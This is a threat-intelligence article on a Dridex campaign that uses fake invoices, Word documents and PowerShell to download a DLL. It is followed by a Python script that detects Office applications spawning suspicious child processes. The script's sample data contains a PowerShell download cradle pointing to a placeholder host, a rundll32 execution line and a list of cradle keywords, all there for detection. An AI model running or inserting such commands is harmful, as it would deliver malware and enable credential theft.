Cybercrime, new Dridex global campaign via false invoices
Technical analysis by malware hunter JAMESWT
New global Dridex campaign using the lure of false invoices. The email contains a link that downloads a Word file, which in turn downloads a DLL and infects the machine with the malware. The attachment, moreover, uses the same template as Emotet.
Dridex is hiding behind a new cybercrime malspam campaign that uses false invoices to deliver the banking trojan in many countries. The text, written in English, refers to a payment and includes a link. This link leads to the download of a Word document on the victim's computer; the document contacts several malicious URLs and downloads a DLL, which starts the malware infection chain. Furthermore, each email contains a different link. If the server detects that the Doc has already been downloaded from that link, the user is instead redirected to another site (https://www.solvay[.]com/en/). Moreover, the attachment uses the same template as the Emotet Doc.
The email text
The Word attachment from which the DLL that infects the computer with malware is downloaded
Emotet template variant
The URLs contacted by the Doc to download the Dridex DLL
The PowerShell launched by the Doc, with the URLs inside
Some Doc URLs
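The chain described above (Word document launching PowerShell, which fetches a DLL from a remote URL) leaves a characteristic parent/child process trace on the endpoint. The following script is an added example, not part of the original article or of JAMESWT's analysis: it scans constructed, Sysmon-style process-creation events (fields `parent`, `image`, `cmdline`; the hostname `example.invalid` and the paths are placeholders) and flags Office applications spawning scripting or LOLBin children, raising the severity when the command line carries a URL or a download-cradle keyword.

```python
"""Flag Office applications spawning script/LOLBin children, as seen in maldoc infection chains."""
import ntpath
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Parents that should rarely launch interpreters or LOLBins in a normal workstation session.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children frequently used by maldocs to stage a second-stage payload.
SUSPICIOUS_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Case-insensitive markers of a PowerShell download cradle.
CRADLE_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "net.webclient",
                  "start-bitstransfer", "invoke-expression")
URL_RE = re.compile(r"""https?://[^\s'"()]+""", re.IGNORECASE)

# Constructed sample events (hypothetical, not telemetry from the campaign).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -nop (New-Object Net.WebClient).DownloadFile("
                "'http://example.invalid/a.dll','C:\\Users\\Public\\a.dll')"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Temp"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c echo hello"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32 C:\\Users\\Public\\a.dll,DllRegisterServer"},
]


@dataclass(frozen=True)
class Finding:
    parent_name: str
    child_name: str
    severity: str   # "high" when a URL or cradle keyword is present, else "medium"
    urls: tuple     # URLs extracted from the command line, for blocking/enrichment


def classify(event: dict) -> Optional[Finding]:
    """Return a Finding for an Office -> suspicious-child event, or None if benign."""
    # ntpath handles Windows paths regardless of the host the analysis runs on.
    parent = ntpath.basename(event["parent"]).lower()
    child = ntpath.basename(event["image"]).lower()
    if parent not in OFFICE_PARENTS or child not in SUSPICIOUS_CHILDREN:
        return None
    cmd = event.get("cmdline", "")
    urls = tuple(URL_RE.findall(cmd))
    cradle = any(marker in cmd.lower() for marker in CRADLE_MARKERS)
    severity = "high" if (urls or cradle) else "medium"
    return Finding(parent, child, severity, urls)


def scan(events: Iterable[dict]) -> List[Finding]:
    """Run classify() over a stream of events and keep only the hits."""
    return [f for f in (classify(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity.upper()}] {finding.parent_name} -> {finding.child_name} "
              f"urls={list(finding.urls)}")
```

The parent/child pairing alone is worth a medium alert because it is rare in legitimate use; the URL and cradle markers only decide escalation. Extracted URLs can be fed straight into a blocklist or pivoted against the campaign's per-email links noted above.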